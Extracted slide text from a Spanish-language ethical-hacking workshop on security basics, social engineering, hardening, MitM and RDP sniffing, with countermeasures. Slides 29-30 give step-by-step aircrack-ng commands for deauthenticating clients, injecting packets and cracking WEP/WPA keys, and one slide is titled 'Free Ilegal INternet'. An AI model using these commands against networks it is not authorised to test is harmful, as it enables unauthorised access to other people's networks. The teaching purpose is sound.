2. Agenda
Presentación
Disclaimer
Arsenal
Conceptos Básicos
Seguridad Informática
Ingeniería Social
Seguridad dentro y fuera del equipo (Tipos de Seguridad)
Software Reset Windows Password Tools (Hiren´s & UBCDW)
Copy/Paste Hack Attack All Windows Versions (Ubuntu CD)
OverView
Crack Windows Passwords Tools (OphCrack)
Contramedidas
Endurecimiento de políticas de seguridad (Hardening)
Herramientas de Intrusión: scanners, sniffers, IDS, etc.
3. Agenda
Ethical Hacking
Ataque Man-in-the-middle (MitM), conceptos
Remote Desktop Protocol (RDP), concepto y uso
Cain MitM RDP Windows Sniffing Password Attack
Contramedidas
Network Wireless, conceptos, usos y características
DEMO “Cracking Wireless Passwords“ con aircrack-ng
OverView
Contramedidas
Recursos
Preguntas y Respuestas
Conclusiones
Contacto
5. Disclaimer
Todos los contenidos expuestos, actividades
realizadas y demostraciones de esta conferencia-
taller son con fines 100% educativos, por lo cual
los expositores e institución educativa que los
imparten se deslindan de cualquier responsabilidad
que los participantes a dicho evento llegaran a
adquirir por el mal uso o daño que pudieran causar
con la información o herramientas aquí expuestas.
6. Arsenal
Para la realización de esta conferencia taller
utilizaremos:
- Desktop PC
- VirtualBox
- Tarjeta de red inalámbrica soportada por aircrack
- Router inalámbrico
- Computadora portátil
- Maquinas virtuales de Windows XP, 2003, Vista y 7
- CDs de: Ubuntu 9.10, OphCrack, etc.
- Software de propósito general
7. Conceptos Básicos
Hacker: Es una buena persona que hace cosas
malas :P
Red de computadoras: Montón de compus unidas
por cable para pasarse virus, bajar música y
chatear.
Sistema Operativo: Programa que controla toda la
compu (Windows, Linux, MacOS, Unix, etc.)
Sniffer: Olfateador de red (sabueso)
Virus: Invento del gobierno para distraer nuestra
atención, H1N1
8. Conceptos Básicos
Firewall: Software o Hardware que protege los
sistemas informáticos de intrusiones en la red
Puerto: Número de conexión dentro de una
computadora para transferir información en la red
Cracker: “Criminal Hacker“
Escritorio Remoto: Aplicación para administrar a
distancia una computadora (Ej. VNC y RDP)
Windows: Muy CrackHackeable :P (Aquí lo
demostraremos, jejejeje )
9. Seguridad Informática
¿Que es? ¿Cómo nos afecta?
• Es simplemente el conjunto • Estamos rodeados de elementos
de métodos, formas y de seguridad informática: PIN de
estándares que permiten tarjeta de débito y crédito,
asegurar que las políticas de números de validación IMEI,
una organización sean tokens bancarios, contraseñas
utilizadas de la manera en de servicios en línea, validadores
de sistemas (como Captcha)
que fueron planeadas todos estos son parte de nuestra
previniendo la alteración o vida diaria, sin una contraseña
modificación o reemplazo de no podríamos accesar nuestra
los datos o directivas cuenta de correo, o retirar dinero
contenidas en nuestros de un cajero y si las perdemos o
recursos de información por nos la roban suele ser laborioso
(social y legal) el obtenerlos de
personas o entidades no regreso.
autorizadas.
¿Todo es basado en
cómputo? ¿Cómo lo aseguramos?
• No, en realidad un recurso • Dependiendo del tipo de
informático es todo aquel recurso, si es electrónico
que resguarda información, quizá sea necesario usar
una ficha bibliográfica, una métodos de biométrica, si es
muestra de ADN codificada, algo mecánico, es probable
un pequeño papel con un que con un juego de llaves
código de acceso para una de seguridad o de candados
caja de seguridad mecánica, rotatorios logremos nuestro
todo esto es información y objetivo, todo depende
es tomado en cuenta al cuanto nos interesa
momento de crear políticas, proteger la información.
acuerdos y leyes sobre la
informática.
10. Ingeniería Social
¿Qué es? ¿Cómo me afecta? ¿Cómo puedo saber si estoy ¿Cómo puedo evitarlo?
• Al no validar las referencias siendo victima de un •Sencillo, si no confiamos en la
• En el campo de la
informática se denomina o no seguir el protocolo de “ingeniero social”? persona que nos pide cierta
“Ingeniería social” al seguridad adecuado para • Muy simple, cuando alguien información (supongamos un
conjunto de métodos y divulgar contraseñas o nos pide algún tipo de técnico de soporte de nuestro
prácticas usados para cualquier otra información información privilegiada y lugar de trabajo) podemos
obtener información de sensible, podríamos ser esta persona es insistente pedirle que nos deje sus datos
cómplices de un crimen, cuando le requerimos seguir y comunicarnos con el/ella 10
usuarios legítimos y con la
México ha acordado con minutos después de validar si
información obtenida lograr un protocolo para validar su la petición es legitima, es decir:
acceso a sistemas organismos internacionales intención es altamente
la homologación y/o solo sigamos los protocolos
protegidos, siendo esta probable que estemos que existan para dar
práctica de uso común entre adecuación de códigos siendo victimas de un información, podemos crear
piratas informáticos y penales para que estos intento de robo de los propios en casa y seguir los
delincuentes delitos sean perseguidos. información por un establecidos en la escuela u
computacionales. ingeniero social/hacker. oficina.
11. Seguridad Dentro y Fuera
Debemos estar conscientes que ningún equipo o sistema es 100% seguro o fiable.
Establecer (y seguir) protocolos y procedimientos de seguridad para contraseñas, códigos, PINs, que nos
permitan asegurar que cuando nos sean requeridos, quien nos lo pida sea alguien autorizado y con un motivo
válido.
Adecuar estas políticas a nuestro propio equipo de cómputo y sistemas, portales y sitios que usamos con
frecuencia (como longitud de contraseñas, uso de caracteres especiales y mayúsculas, etc.) y prevenir el uso
de “cuentas compartidas” o “uso múltiple” pues eso eleva el riesgo de control y seguridad.
Ser precavidos, si algo no parece estar correcto es muy probable que no lo este.
Si estamos en la escuela u oficina y algo parece estar mal, reportarlo inmediatamente ya sea a nuestro jefe o
profesor o al área encargada de sistemas.
Seguir los reglamentos (si no nos esta permitido accesar ciertos sitios, no lo hagamos).
Seguir nuestro instinto, muchas veces nosotros somos los mejores jueces para evaluar si algo esta bien o no.
12. Tipos de Seguridad:
Seguridad Física: Seguridad Física consiste en la "aplicación de
barreras físicas y procedimientos de control, como medidas de
prevención y contramedidas ante amenazas a los recursos e
información confidencial"(1). Se refiere a los controles y mecanismos
de seguridad dentro y alrededor del Centro de Cómputo así como los
medios de acceso remoto al y desde el mismo; implementados para
proteger el hardware y medios de almacenamiento de datos.
Seguridad Lógica: La mayoría de los daños que puede sufrir un
centro de cómputos no será sobre los medios físicos sino contra
información por él almacenada y procesada. La Seguridad Física, sólo
es una parte del amplio espectro que se debe cubrir para no vivir con
una sensación ficticia de seguridad. Como ya se ha mencionado, el
activo más importante que se posee es la información, y por lo tanto
deben existir técnicas, más allá de la seguridad física, que la aseguren.
Estas técnicas las brinda la Seguridad Lógica.
16. Contramedidas
1- Seguridad Física del equipo
2- Boot CD deshabilitado
3- Password supervisor habilitado
4- Contraseñas robustas contra el password cracking
17. Hardening
¿Qué es? ¿Cómo se logra?
• Un conjunto de métodos y directivas • Las técnicas son amplias y van desde
que permiten elevar el nivel de la eliminación de cuentas de acceso
seguridad de un servidor y validación mediante métodos
computacional (principalmente) con alternativos (como LDAP) hasta la
el fin de denegar accesos no desinstalación, revisión y adecuación
autorizados y evitar intrusiones y/o de servicios, archivos de
ataques computacionales, existen configuración e instalación de
ciertos programas que nos ayudan a centinelas de cambios en las
detectar fallos como “Bastille” de maquinas a “endurecer”, existen
HP/Compaq que tuvo un éxito mas o incluso niveles que permiten
menos amplio en sistemas con comunicación solo de 1:1 (es decir
Solaris y posteriormente en sistemas una maquina solo va a “escuchar” a
GNU/Linux. otra que fue validada y no más.
¿Quién lo hace? ¿Qué sistema es el más inseguro?
• Principalmente, administradores de • En realidad, existe un mantra que
sistemas o consultores de dice: “No hay sistema inseguro,
seguridad computacional, la razón solo un mal administrador” es
principal de esto es el decir, si adecuamos un equipo y
conocimiento requerido en elevamos el nivel de seguridad a lo
administración de sistemas e técnicamente posible, es muy
infraestructura para poder llevar a probable que los demás errores
cabo un buen endurecimiento (con sean bugs del software mismo.
lo cual, una vez más, no podemos
garantizar que sea 100% mas
seguro, solo mas estable).
18. Herramientas de Intrusión:
scanners, sniffers, IDS, etc.
• Denegación de servicio (PaP o distribuidas)
• Exploración de servicios y vulnerabilidades
Existen una gran (PenTesting y Exploitation)
cantidad de • Rompimiento de claves de autenticación (Auth
Cracking)
herramientas de este • Capturadores de paquetes promiscuos (Sniffers,
AirSniffers)
tipo entre las mas • Enumeradores de puertos y adivinadores de
comunes usadas en plataforma.
• Enmascaradores o “phishing posers” (servicios que
contra de servidores: parecen legítimos pero no lo son, enfocados al robo
de información e identidad)
• Troyanos
Por el lado de los • Gusanos
ataques a usuarios • Secuestradores y envenenadores de DNS
existen las siguientes • Keyloggers
herramientas: • Replicadores
http://sectools.org/
19. Ethical Hacking
¿Qué es?
•La intrusión ética (o ethical
hacking) es la aplicación de
herramientas de intrusión,
penetración, robo,
¿No es contraproducente?
personificación y negación de
servicio llevado a cabo por •No, al usar las armas que el
“hackers éticos”, es decir, enemigo utiliza es mas factible
personas con la experiencia y que podamos determinar el
conocimiento suficiente para nivel de riesgo, y por tanto la
llevar a cabo estas pruebas en respuesta que debemos dar ante
nombre de la organización (es un ataque, es, viéndolo como
decir de manera legal y prevista) analogía medica, como cuando
para determinar el nivel de nos vacunan, pues nos inoculan
seguridad de una red de equipos una “versión” del virus del cual
o servicios (incluido el aspecto nos quieren hacer inmunes.
de ingeniería social).
¿Por qué es importante? ¿Es fiable?
•Al conocer el nivel de seguridad •Al contratar nosotros un servicio
que se tiene en nuestra (o realizarlo de manera interna)
organización es mucho mas estamos confiando en la ética
sencillo, que no simple, el tomar profesional de quien evalúa por
medidas que puedan subsanar lo que si, siempre llevamos un
estas deficiencias. riesgo, pero se establece un
contrato de buena fe haciéndolo
“suficientemente fiable”.
20. Ataque Man-in-the-middle (MitM),
conceptos
En criptografía, un ataque man-in-the-middle (MitM o
intermediario, en castellano) es un ataque en el que
el enemigo adquiere la capacidad de leer, insertar y
modificar a voluntad, los mensajes entre dos partes
sin que ninguna de ellas conozca que el enlace entre
ellos ha sido violado. El atacante debe ser capaz de
observar e interceptar mensajes entre las dos
víctimas.
21. Ataque Man-in-the-middle (MitM),
conceptos
El ataque MitM puede incluir algunos de los siguientes subataques:
1. Intercepción de la comunicación (eavesdropping), incluyendo
análisis del tráfico y posiblemente un ataque a partir de textos
planos (plaintext) conocidos.
2. Ataques a partir de textos cifrados escogidos, en función de lo que
el receptor haga con el mensaje descifrado.
3. Ataques de sustitución.
4. Ataques de repetición.
5. Ataque por denegación de servicio (denial of service).
22. Contramedidas
Claves públicas
Autenticación mutua fuerte
Claves secretas (secretos con alta entropía)
Passwords (secretos con baja entropía)
Otros criterios, como el reconocimiento de voz u otras características
biométricas
23. Remote Desktop Protocol (RDP),
concepto y uso
Remote Desktop Protocol (RDP) es un protocolo
propietario desarrollado por Microsoft que permite la
comunicación en la ejecución de una aplicación entre
un terminal (mostrando la información procesada que
recibe del servidor) y un servidor Windows
(recibiendo la información dada por el usuario en el
terminal mediante el ratón ó el teclado).
24. Cain MitM RDP Windows Sniffing
Password Attack y
Contramedidas
RDP OverView
25. Network Wireless, conceptos,
usos y características
El término red inalámbrica (Wireless network) en
inglés es un término que se utiliza en informática para
designar la conexión de nodos sin necesidad de una
conexión física (cables), ésta se da por medio de
ondas electromagnéticas. La transmisión y la
recepción se realizan a través de puertos.
Una de sus principales ventajas es notable en los
costos, ya que se elimina todo el cable Ethernet y
conexiones físicas entre nodos, pero también tiene
una desventaja considerable ya que para este tipo de
red se debe de tener una seguridad mucho mas
exigente y robusta para evitar a los intrusos.
26. DEMO “Cracking Wireless
Passwords“ con aircrack-ng
OverView y
Contramedidas
Free Ilegal INternet
27. DEMO “Cracking Wireless
Passwords“
Aircrack: http://www.aircrack-ng.org/
Aircrack Spanish: http://www.aircrack.es/
Compatibilidad de tarjetas inalámbricas con Linux:
http://linux-wless.passys.nl/query_alles.php
29. DEMO “Cracking Wireless
Passwords“
control + c
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
PARA WEP
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
PARA WEP
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
30. DEMO “Cracking Wireless
Passwords“
PARA WEP
sudo aircrack-ng -z [nombre red]*.cap
Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los
mismos, hasta que se nos muestre la clave de la red.
34. Conclusiones
La seguridad computacional como un todo.
El elemento humano dentro de la seguridad computacional.
El establecimiento de reglas para un mejor nivel de seguridad.
Necesidad de profesionistas calificados para estos trabajos.
Gran amplitud de herramientas OpenSource.
Compromiso social y ético para sistemas.
Innovación diaria.